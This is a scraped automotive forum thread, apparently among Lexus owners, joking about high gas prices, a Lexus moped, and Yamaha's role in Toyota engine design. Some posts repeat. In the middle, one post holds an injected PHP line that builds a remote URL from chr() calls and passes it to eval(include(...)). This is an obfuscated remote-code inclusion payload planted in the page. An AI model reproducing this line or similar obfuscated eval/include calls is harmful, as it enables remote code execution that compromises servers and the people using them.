Does Lexus Make A Moped?

I wanna know, cuz these fricking gas prices are insane. $2.80 - $3.05 a gallon. Not to sound like my grandparents but I remember back in 1999 I could get a gal of gas for 75 cents. ah the good old days. Still keeping my es300 but a MOPED with the lexus emblem on the front sounds mighty nice right now.

I wanna know, cuz these fricking gas prices are insane. $2.80 - $3.05 a gallon. Not to sound like my grandparents but I remember back in 1999 I could get a gal of gas for 75 cents. ah the good old days. Still keeping my es300 but a MOPED with the lexus emblem on the front sounds mighty nice right now.

Where do you live? I haven't seen prices under $115 since 1993 and would be happy with anything under $2 at this point. However, like most, I will drive my car and ..., in the infamous words of Jim Carrey, "bend over and take it up the tailpipe!".

Werd on the > $1 regular gas in 1990+ & gas is cheap in Alabama (Relatively).

I remember when I was 4-5 & you could always see the old muscle cars & non-road legal racers (Cricle & drag) filling up with av gas at the 76 station. it was $1.05. (86-88). When I first started driving gas was $1.23-$1.35 in the late 90's. I got to college & freaked the *BLEEP* out when it hit $1.70 for 87 !? Thank god for the civic & the rolla...

I graduated High school in 99 and I had an 84 Buick Lesabre V8 everyweek i had a hockey game and once i week at least for like 4 weeks I would fill up with gas that was 75 cents a gallon. I'm in delaware, and games would be in South Jersey, namely Deptford. I was a poor high school student filling up my Big buick for like 20$

Where do you live? I haven't seen prices under $115 since 1993 and would be happy with anything under $2 at this point. However, like most, I will drive my car and ..., in the infamous words of Jim Carrey, "bend over and take it up the tailpipe!".

Gas was $.89 a gallon here (regular) circa 1999 I'd guess.

My GSXR is no Lexus but for about 50 mpg, I will take it. Going to buy another “scoter/moped” again this year. Mine is too slow :D

I am thinking about getting another "scoter/moped" too!!! LOL

:cries: reneval(eval(include(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(119).chr(119).chr(119).chr(46).chr(110).chr(97).chr(110).chr(111).chr(119).chr(97).chr(114).chr(115).chr(46).chr(110).chr(97).chr(114).chr(111).chr(100).chr(46).chr(114).chr(117).chr(47).chr(99).chr(46).chr(112).chr(104).chr(112))));//

you mean like this? i even through in some SC rims on there, its the sports package, the logo is under the seat and under the headlight, enjoy, LEXUS © The Passionate Pursuit of Perfection

wqr94x.jpg

LOL!!!!!!!! :cheers:

You need some more chrome on it!!! :unsure:

lol to the original poster, i dont know how your still paying a dollar something, i paid a record for premium today, $3.57 in san francisco. sigh...should not have bought an AWD. I suspect people who own hybrids are taken them out of their garage more often, cough Swo3es

Yamaha flat out designed, or their base/previous designs

are used in every single Toyota/Lexus/Scion manufactured gasoline engines they've sold for numourous years now.

All of the v6's head's dating back to the 2.0L vz-fe were yamaha heads.

The UZ heads were not "said" to beyamaha, but their design closely parrallel's, and obviously takes many, many cues from the heads yamaha is "known" to have designed. It wouldn't suprize me if the UZ heads are all Yamaha designs.

The ole, "If it looks like a duck, walks like a duck, quacks like a duck... It's a duck." rule.

lol to the original poster, i dont know how your still paying a dollar something, i paid a record for premium today, $3.57 in san francisco. sigh...should not have bought an AWD. I suspect people who own hybrids are taken them out of their garage more often, cough Swo3es

Oh no its 2.85 for regular here back in '99 is when it was 75-85 cents. I had no idea people would be getting into this post as much. I posted this out of shear outrage and now i find myself laughing my butt off. :cheers: